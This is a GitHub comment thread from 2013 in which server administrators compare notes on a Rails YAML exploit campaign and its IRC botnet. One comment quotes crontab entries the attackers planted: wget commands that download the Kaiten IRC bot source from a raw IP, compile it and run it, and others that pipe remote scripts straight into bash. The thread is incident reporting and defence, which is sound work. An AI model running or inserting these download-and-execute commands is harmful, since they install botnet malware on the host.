commented
May 27, 2013
|
It looks like it's part of a botnet, as it's using IRC. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
dylancopeland
May 27, 2013
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".
dylancopeland
commented
May 27, 2013
|
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
tadman
May 28, 2013
You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.
tadman
commented
May 28, 2013
|
You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
ismasan
May 28, 2013
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.
All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!
|
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference. All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks! |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
conqueringlion93
May 28, 2013
Hi,
an what about my configuration ??
Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :
- k.c, k and ka files in /var/tmp (probably irc script)
- an new line in my crontab executing some wget like this :
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -
wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).
I'm still searching how the malicious scripts were upload to my server ...
conqueringlion93
commented
May 28, 2013
|
Hi, an what about my configuration ?? Server version: Apache/2.2.14 (Ubuntu) no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above). I'm still searching how the malicious scripts were upload to my server ... |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Batistleman
May 29, 2013
Hi,
my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?
Batistleman
commented
May 29, 2013
|
Hi, my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
rogerthat
commented
May 29, 2013
definetly |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Leglaw
May 29, 2013
@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.
Leglaw
commented
May 29, 2013
|
@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
commented
May 30, 2013
|
Ok, anyway we known now where the problem comes from. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Sorenfu
commented
May 30, 2013
|
Sounds like this one |
Hi,
I have the same msg from my server since 3 days, any ideas to block this attempt ?